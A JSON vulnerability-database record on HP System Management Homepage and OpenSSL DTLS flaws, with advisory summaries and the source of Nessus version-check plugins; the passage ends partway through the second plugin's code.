{"id": "SECURITYVULNS:VULN:10790", "bulletinFamily": "software", "title": "HP System Management Homepage multiple security vulnerabilities", "description": "Crossite scripting, DoS, unauthorized access, code execution.", "published": "2010-05-20T00:00:00", "modified": "2010-05-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10790", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:23702", "https://vulners.com/securityvulns/securityvulns:doc:23890"], "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2008-4226", "CVE-2009-1387", "CVE-2008-5814", "CVE-2009-1378", "CVE-2009-3555", "CVE-2010-1034", "CVE-2008-1468", "CVE-2008-5557"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:36", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "024ebba7b93fdec0a473fffd058ed76c"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94f90ac95701c385240a939a8758e324"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "628ce3d8257e53d7c3d7aa7ec2e00e2a"}, {"key": "href", "hash": "058dcfde8dba4a2f68ea3b68fef42eac"}, {"key": "modified", "hash": "5d2e55a131f4d9fce0b8766e2a00ef34"}, {"key": "published", "hash": "5d2e55a131f4d9fce0b8766e2a00ef34"}, {"key": "references", "hash": "0ae59d1f00bfffd1c5c42f360d10f072"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "6d31949e0b45edeee3513269c99e6d37"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "695a8fb2cb603b75e6d0f07543a45b40f710a175761a6cf536f833830117c916", "viewCount": 0, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-08-31T11:09:36"}, "vulnersScore": 6.8}, "objectVersion": "1.3", "affectedSoftware": [{"name": "HP System Management Homepage", "operator": "eq", "version": "6.0"}]}

{"openssl": [{"lastseen": "2016-02-20T11:00:03", "references": [], "description": "Fix denial of service flaws in the DTLS implementation. A remote attacker could use these flaws to cause a DTLS server to use excessive amounts of memory, or crash. Reported by Daniel Mentz, Robin Seggelmann.", "edition": 1, "reporter": "OpenSSL", "published": "2009-05-12T00:00:00", "title": "Vulnerability in OpenSSL (CVE-2009-1377, CVE-2009-1378, CVE-2009-1379)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "bulletinFamily": "software", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2009-05-12T00:00:00", "id": "OPENSSL:CVE-2009-1377,CVE-2009-1378,CVE-2009-1379", "href": "https://www.openssl.org/news/vulnerabilities.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-02-24T04:00:08", "references": [], "description": "Fix denial of service flaws in the DTLS implementation. A remote attacker could use these flaws to cause a DTLS server to use excessive amounts of memory, or crash. Reported by Daniel Mentz, Robin Seggelmann.", "edition": 1, "reporter": "OpenSSL", "published": "2009-05-12T00:00:00", "title": "Vulnerability in OpenSSL (CVE-2009-1378, CVE-2009-1379, CVE-2009-1377)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "bulletinFamily": "software", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2009-05-12T00:00:00", "id": "OPENSSL:CVE-2009-1378,CVE-2009-1379,CVE-2009-1377", "href": "https://www.openssl.org/news/vulnerabilities.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-03-14T12:00:19", "references": [], "description": "Fix denial of service flaws in the DTLS implementation. A remote attacker could use these flaws to cause a DTLS server to use excessive amounts of memory, or crash. Reported by Daniel Mentz, Robin Seggelmann.", "edition": 1, "reporter": "OpenSSL", "published": "2009-05-12T00:00:00", "title": "Vulnerability in OpenSSL (CVE-2009-1378, CVE-2009-1377, CVE-2009-1379)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "bulletinFamily": "software", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2009-05-12T00:00:00", "id": "OPENSSL:CVE-2009-1378,CVE-2009-1377,CVE-2009-1379", "href": "https://www.openssl.org/news/vulnerabilities.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-03-19T09:00:14", "references": [], "edition": 1, "description": "Fix denial of service flaws in the DTLS implementation. A remote attacker could use these flaws to cause a DTLS server to use excessive amounts of memory, or crash. Reported by Daniel Mentz, Robin Seggelmann.", "reporter": "OpenSSL", "published": "2009-05-12T00:00:00", "title": "Vulnerability in OpenSSL (CVE-2009-1377, CVE-2009-1379, CVE-2009-1378)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "bulletinFamily": "software", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2009-05-12T00:00:00", "href": "https://www.openssl.org/news/vulnerabilities.html", "id": "OPENSSL:CVE-2009-1377,CVE-2009-1379,CVE-2009-1378", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-03-10T04:00:15", "references": [], "description": "Fix denial of service flaws in the DTLS implementation. A remote attacker could use these flaws to cause a DTLS server to use excessive amounts of memory, or crash. Reported by Daniel Mentz, Robin Seggelmann.", "edition": 1, "reporter": "OpenSSL", "published": "2009-05-12T00:00:00", "title": "Vulnerability in OpenSSL (CVE-2009-1379, CVE-2009-1378, CVE-2009-1377)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "bulletinFamily": "software", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2009-05-12T00:00:00", "id": "OPENSSL:CVE-2009-1379,CVE-2009-1378,CVE-2009-1377", "href": "https://www.openssl.org/news/vulnerabilities.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:22:35", "references": [], "edition": 1, "description": "Fix denial of service flaws in the DTLS implementation. A remote attacker could use these flaws to cause a DTLS server to use excessive amounts of memory, or crash. Reported by Daniel Mentz, Robin Seggelmann.", "reporter": "OpenSSL", "published": "2009-05-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2009-1379, CVE-2009-1377, CVE-2009-1378)", "bulletinFamily": "software", "affectedSoftware": [{"name": "openssl", "version": "0.9.8e", "operator": "eq"}, {"name": "openssl", "version": "0.9.8c", "operator": "eq"}, {"name": "openssl", "version": "0.9.8j", "operator": "eq"}, {"name": "openssl", "version": "0.9.8l", "operator": "eq"}, {"name": "openssl", "version": "0.9.8d", "operator": "eq"}, {"name": "openssl", "version": "0.9.8i", "operator": "eq"}, {"name": "openssl", "version": "0.9.8g", "operator": "eq"}, {"name": "openssl", "version": "0.9.8b", "operator": "eq"}, {"name": "openssl", "version": "0.9.8f", "operator": "eq"}, {"name": "openssl", "version": "0.9.8", "operator": "eq"}, {"name": "openssl", "version": "0.9.8a", "operator": "eq"}, {"name": "openssl", "version": "0.9.8h", "operator": "eq"}, {"name": "openssl", "version": "0.9.8k", "operator": "eq"}], "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1378"], "modified": "2009-05-12T00:00:00", "id": "OPENSSL:CVE-2009-1379,CVE-2009-1377,CVE-2009-1378", "href": "https://www.openssl.org/news/vulnerabilities.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:22:35", "references": [], "edition": 1, "description": "Fix denial of service flaw due in the DTLS implementation. A remote attacker could use this flaw to cause a DTLS server to crash. Reported by Robin Seggelmann.", "reporter": "OpenSSL", "published": "2009-02-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2009-1387)", "bulletinFamily": "software", "affectedSoftware": [{"name": "openssl", "version": "0.9.8e", "operator": "eq"}, {"name": "openssl", "version": "0.9.8c", "operator": "eq"}, {"name": "openssl", "version": "0.9.8j", "operator": "eq"}, {"name": "openssl", "version": "0.9.8l", "operator": "eq"}, {"name": "openssl", "version": "0.9.8d", "operator": "eq"}, {"name": "openssl", "version": "0.9.8i", "operator": "eq"}, {"name": "openssl", "version": "0.9.8g", "operator": "eq"}, {"name": "openssl", "version": "0.9.8b", "operator": "eq"}, {"name": "openssl", "version": "0.9.8f", "operator": "eq"}, {"name": "openssl", "version": "0.9.8", "operator": "eq"}, {"name": "openssl", "version": "0.9.8a", "operator": "eq"}, {"name": "openssl", "version": "0.9.8h", "operator": "eq"}, {"name": "openssl", "version": "0.9.8k", "operator": "eq"}], "cvelist": ["CVE-2009-1387"], "modified": "2009-02-05T00:00:00", "id": "OPENSSL:CVE-2009-1387", "href": "https://www.openssl.org/news/vulnerabilities.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:22:35", "references": [], "edition": 1, "description": "Fix a NULL pointer dereference if a DTLS server recieved ChangeCipherSpec as first record. A remote attacker could use this flaw to cause a DTLS server to crash Reported by Alex Lam.", "reporter": "OpenSSL", "published": "2009-06-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2009-1386)", "bulletinFamily": "software", "affectedSoftware": [{"name": "openssl", "version": "0.9.8e", "operator": "eq"}, {"name": "openssl", "version": "0.9.8c", "operator": "eq"}, {"name": "openssl", "version": "0.9.8d", "operator": "eq"}, {"name": "openssl", "version": "0.9.8g", "operator": "eq"}, {"name": "openssl", "version": "0.9.8b", "operator": "eq"}, {"name": "openssl", "version": "0.9.8f", "operator": "eq"}, {"name": "openssl", "version": "0.9.8", "operator": "eq"}, {"name": "openssl", "version": "0.9.8a", "operator": "eq"}, {"name": "openssl", "version": "0.9.8h", "operator": "eq"}], "cvelist": ["CVE-2009-1386"], "modified": "2009-06-02T00:00:00", "id": "OPENSSL:CVE-2009-1386", "href": "https://www.openssl.org/news/vulnerabilities.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-22T13:02:36", "references": [], "description": "Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function could cause a client accessing a malicious DTLS server to crash. Reported by Daniel Mentz, Robin Seggelmann.", "edition": 1, "reporter": "OpenSSL", "published": "2009-05-12T00:00:00", "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2009-1379)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [{"name": "openssl", "version": "0.9.8k", "operator": "eq"}, {"name": "openssl", "version": "0.9.8a", "operator": "eq"}, {"name": "openssl", "version": "0.9.8", "operator": "eq"}, {"name": "openssl", "version": "0.9.8f", "operator": "eq"}, {"name": "openssl", "version": "0.9.8g", "operator": "eq"}, {"name": "openssl", "version": "0.9.8j", "operator": "eq"}, {"name": "openssl", "version": "0.9.8l", "operator": "eq"}, {"name": "openssl", "version": "0.9.8b", "operator": "eq"}, {"name": "openssl", "version": "0.9.8d", "operator": "eq"}, {"name": "openssl", "version": "0.9.8e", "operator": "eq"}, {"name": "openssl", "version": "0.9.8i", "operator": "eq"}, {"name": "openssl", "version": "0.9.8c", "operator": "eq"}, {"name": "openssl", "version": "0.9.8h", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2009-1379"], "modified": "2009-05-12T00:00:00", "href": "https://www.openssl.org/news/vulnerabilities.html", "id": "OPENSSL:CVE-2009-1379", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-22T13:02:36", "references": [], "description": "Fix a denial of service flaw in the DTLS implementation. In dtls1_process_out_of_seq_message() the check if the current message is already buffered was missing. For every new message was memory allocated, allowing an attacker to perform an denial of service attack against a DTLS server by sending out of seq handshake messages until there is no memory left. Reported by Daniel Mentz, Robin Seggelmann.", "edition": 1, "reporter": "OpenSSL", "published": "2009-05-12T00:00:00", "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2009-1378)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [{"name": "openssl", "version": "0.9.8k", "operator": "eq"}, {"name": "openssl", "version": "0.9.8a", "operator": "eq"}, {"name": "openssl", "version": "0.9.8", "operator": "eq"}, {"name": "openssl", "version": "0.9.8f", "operator": "eq"}, {"name": "openssl", "version": "0.9.8g", "operator": "eq"}, {"name": "openssl", "version": "0.9.8j", "operator": "eq"}, {"name": "openssl", "version": "0.9.8l", "operator": "eq"}, {"name": "openssl", "version": "0.9.8b", "operator": "eq"}, {"name": "openssl", "version": "0.9.8d", "operator": "eq"}, {"name": "openssl", "version": "0.9.8e", "operator": "eq"}, {"name": "openssl", "version": "0.9.8i", "operator": "eq"}, {"name": "openssl", "version": "0.9.8c", "operator": "eq"}, {"name": "openssl", "version": "0.9.8h", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2009-1378"], "modified": "2009-05-12T00:00:00", "href": "https://www.openssl.org/news/vulnerabilities.html", "id": "OPENSSL:CVE-2009-1378", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-02T00:09:20", "references": ["http://seclists.org/bugtraq/2010/Feb/47", "http://seclists.org/bugtraq/2010/Apr/205", "http://www.nessus.org/u?399c92c8", "http://www.nessus.org/u?2eb58026", "http://www.nessus.org/u?857eff38"], "pluginID": "46015", "description": "According to its self-reported version number, the HP System Management Homepage install on the remote host is earlier than 6.0.0.96 / 6.0.0-95. Such versions are potentially affected by the following vulnerabilities :\n\n - A cross-site scripting (XSS) vulnerability due to a failure to sanitize UTF-7 encoded input. Browsers are only affected if encoding is set to auto-select.\n (CVE-2008-1468)\n\n - An integer overflow in the libxml2 library that can result in a heap overflow. (CVE-2008-4226)\n\n - A buffer overflow in the PHP mbstring extension.\n (CVE-2008-5557)\n\n - An unspecified XSS in PHP when 'display_errors' is enabled. (CVE-2008-5814)\n\n - Multiple denial of service vulnerabilities in OpenSSL DTLS. (CVE-2009-1377, CVE-2009-1378, CVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\n - A cross-site scripting vulnerability due to a failure to sanitize input to the 'servercert' parameter of '/proxy/smhu/getuiinfo'. (CVE-2009-4185)\n\n - An unspecified vulnerability that could allow an attacker to access sensitive information, modify data, or cause a denial of service. (CVE-2010-1034)", "edition": 9, "reporter": "Tenable", "published": "2010-04-27T00:00:00", "title": "HP System Management Homepage < 6.0.0.96 / 6.0.0-95 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-4185", "CVE-2008-4226", "CVE-2009-1387", "CVE-2008-5814", "CVE-2009-1378", "CVE-2010-1034", "CVE-2008-1468", "CVE-2008-5557"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/a:hp:system_management_homepage"], "id": "HPSMH_6_0_0_95.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46015", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(46015);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n\n script_cve_id(\n \"CVE-2008-1468\",\n \"CVE-2008-4226\",\n \"CVE-2008-5557\",\n \"CVE-2008-5814\",\n \"CVE-2009-1377\",\n \"CVE-2009-1378\",\n \"CVE-2009-1379\",\n \"CVE-2009-1386\",\n \"CVE-2009-1387\",\n \"CVE-2010-1034\",\n \"CVE-2009-4185\"\n );\n script_bugtraq_id(\n 28380,\n 32326,\n 32948,\n 35001,\n 35138,\n 35174,\n 35417,\n 38081,\n 39632\n );\n script_xref(name:\"Secunia\", value:\"38341\");\n\n script_name(english:\"HP System Management Homepage < 6.0.0.96 / 6.0.0-95 Multiple Vulnerabilities\");\n script_summary(english:\"Does a banner check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web server has multiple vulnerabilities.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its self-reported version number, the HP System\nManagement Homepage install on the remote host is earlier than\n6.0.0.96 / 6.0.0-95. Such versions are potentially affected by the\nfollowing vulnerabilities :\n\n - A cross-site scripting (XSS) vulnerability due to a\n failure to sanitize UTF-7 encoded input. Browsers are\n only affected if encoding is set to auto-select.\n (CVE-2008-1468)\n\n - An integer overflow in the libxml2 library that can\n result in a heap overflow. (CVE-2008-4226)\n\n - A buffer overflow in the PHP mbstring extension.\n (CVE-2008-5557)\n\n - An unspecified XSS in PHP when 'display_errors' is\n enabled. (CVE-2008-5814)\n\n - Multiple denial of service vulnerabilities in OpenSSL\n DTLS. (CVE-2009-1377, CVE-2009-1378, CVE-2009-1379,\n CVE-2009-1386, CVE-2009-1387)\n\n - A cross-site scripting vulnerability due to a failure\n to sanitize input to the 'servercert' parameter of\n '/proxy/smhu/getuiinfo'. (CVE-2009-4185)\n\n - An unspecified vulnerability that could allow an\n attacker to access sensitive information, modify data,\n or cause a denial of service. (CVE-2010-1034)\"\n );\n # https://web.archive.org/web/20100611001622/http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr09-15\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?857eff38\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://seclists.org/bugtraq/2010/Apr/205\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://seclists.org/bugtraq/2010/Feb/47\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2eb58026\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?399c92c8\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to HP System Management Homepage 6.0.0.96 (Windows) /\n6.0.0-95 (Linux) or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(79, 119, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:system_management_homepage\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"compaq_wbem_detect.nasl\");\n script_require_keys(\"www/hp_smh\");\n script_require_ports(\"Services/www\", 2301, 2381);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:2381, embedded:TRUE);\n\n\ninstall = get_install_from_kb(appname:'hp_smh', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nversion = install['ver'];\nprod = get_kb_item_or_exit(\"www/\"+port+\"/hp_smh/variant\");\nif (version == UNKNOWN_VER)\n exit(1, 'The version of '+prod+' installed at '+build_url(port:port, qs:dir+\"/\")+' is unknown.');\n\n# nb: 'version' can have non-numeric characters in it so we'll create\n# an alternate form and make sure that's safe for use in 'ver_compare()'.\nversion_alt = ereg_replace(pattern:\"[_-]\", replace:\".\", string:version);\nif (!ereg(pattern:\"^[0-9][0-9.]+$\", string:version_alt))\n exit(1, 'The version of '+prod+' installed at '+build_url(port:port, qs:dir+\"/\")+' does not look valid ('+version+').');\n\n# technically 6.0.0.95 is the fix for Linux and 6.0.0.96 is the fix for\n# Windows, but there is no way to infer OS from the banner. since there\n# is no 6.0.0.95 publicly released for Windows, this check should be\n# Good Enough\nfixed_version = '6.0.0.95';\nif (ver_compare(ver:version_alt, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n source_line = get_kb_item(\"www/\"+port+\"/hp_smh/source\");\n\n report = '\\n Product : ' + prod;\n if (!isnull(source_line))\n report += '\\n Version source : ' + source_line;\n report +=\n '\\n Installed version : ' + version +\n '\\n Fixed version : 6.0.0.96 (Windows) / 6.0.0-95 (Linux)\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n\n exit(0);\n}\nelse exit(0, prod+\" \"+version+\" is listening on port \"+port+\" and is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:29", "references": [], "pluginID": "39534", "description": "It was discovered that OpenSSL did not limit the number of DTLS records it would buffer when they arrived with a future epoch. A remote attacker could cause a denial of service via memory resource consumption by sending a large number of crafted requests.\n(CVE-2009-1377)\n\nIt was discovered that OpenSSL did not properly free memory when processing DTLS fragments. A remote attacker could cause a denial of service via memory resource consumption by sending a large number of crafted requests. (CVE-2009-1378)\n\nIt was discovered that OpenSSL did not properly handle certain server certificates when processing DTLS packets. A remote DTLS server could cause a denial of service by sending a message containing a specially crafted server certificate. (CVE-2009-1379)\n\nIt was discovered that OpenSSL did not properly handle a DTLS ChangeCipherSpec packet when it occured before ClientHello. A remote attacker could cause a denial of service by sending a specially crafted request. (CVE-2009-1386)\n\nIt was discovered that OpenSSL did not properly handle out of sequence DTLS handshake messages. A remote attacker could cause a denial of service by sending a specially crafted request. (CVE-2009-1387).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2009-06-26T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : openssl vulnerabilities (USN-792-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378"], "modified": "2016-12-01T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:openssl-doc", "p-cpe:/a:canonical:ubuntu_linux:openssl", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libssl-dev", "p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8", "p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8-dbg", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-792-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39534", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-792-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39534);\n script_version(\"$Revision: 1.16 $\");\n script_cvs_date(\"$Date: 2016/12/01 21:21:52 $\");\n\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\");\n script_bugtraq_id(35001, 35138, 35174, 35417);\n script_xref(name:\"USN\", value:\"792-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : openssl vulnerabilities (USN-792-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that OpenSSL did not limit the number of DTLS\nrecords it would buffer when they arrived with a future epoch. A\nremote attacker could cause a denial of service via memory resource\nconsumption by sending a large number of crafted requests.\n(CVE-2009-1377)\n\nIt was discovered that OpenSSL did not properly free memory when\nprocessing DTLS fragments. A remote attacker could cause a denial of\nservice via memory resource consumption by sending a large number of\ncrafted requests. (CVE-2009-1378)\n\nIt was discovered that OpenSSL did not properly handle certain server\ncertificates when processing DTLS packets. A remote DTLS server could\ncause a denial of service by sending a message containing a specially\ncrafted server certificate. (CVE-2009-1379)\n\nIt was discovered that OpenSSL did not properly handle a DTLS\nChangeCipherSpec packet when it occured before ClientHello. A remote\nattacker could cause a denial of service by sending a specially\ncrafted request. (CVE-2009-1386)\n\nIt was discovered that OpenSSL did not properly handle out of sequence\nDTLS handshake messages. A remote attacker could cause a denial of\nservice by sending a specially crafted request. (CVE-2009-1387).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssl-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2016 Canonical, Inc. / NASL script (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|8\\.10|9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 8.10 / 9.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl-dev\", 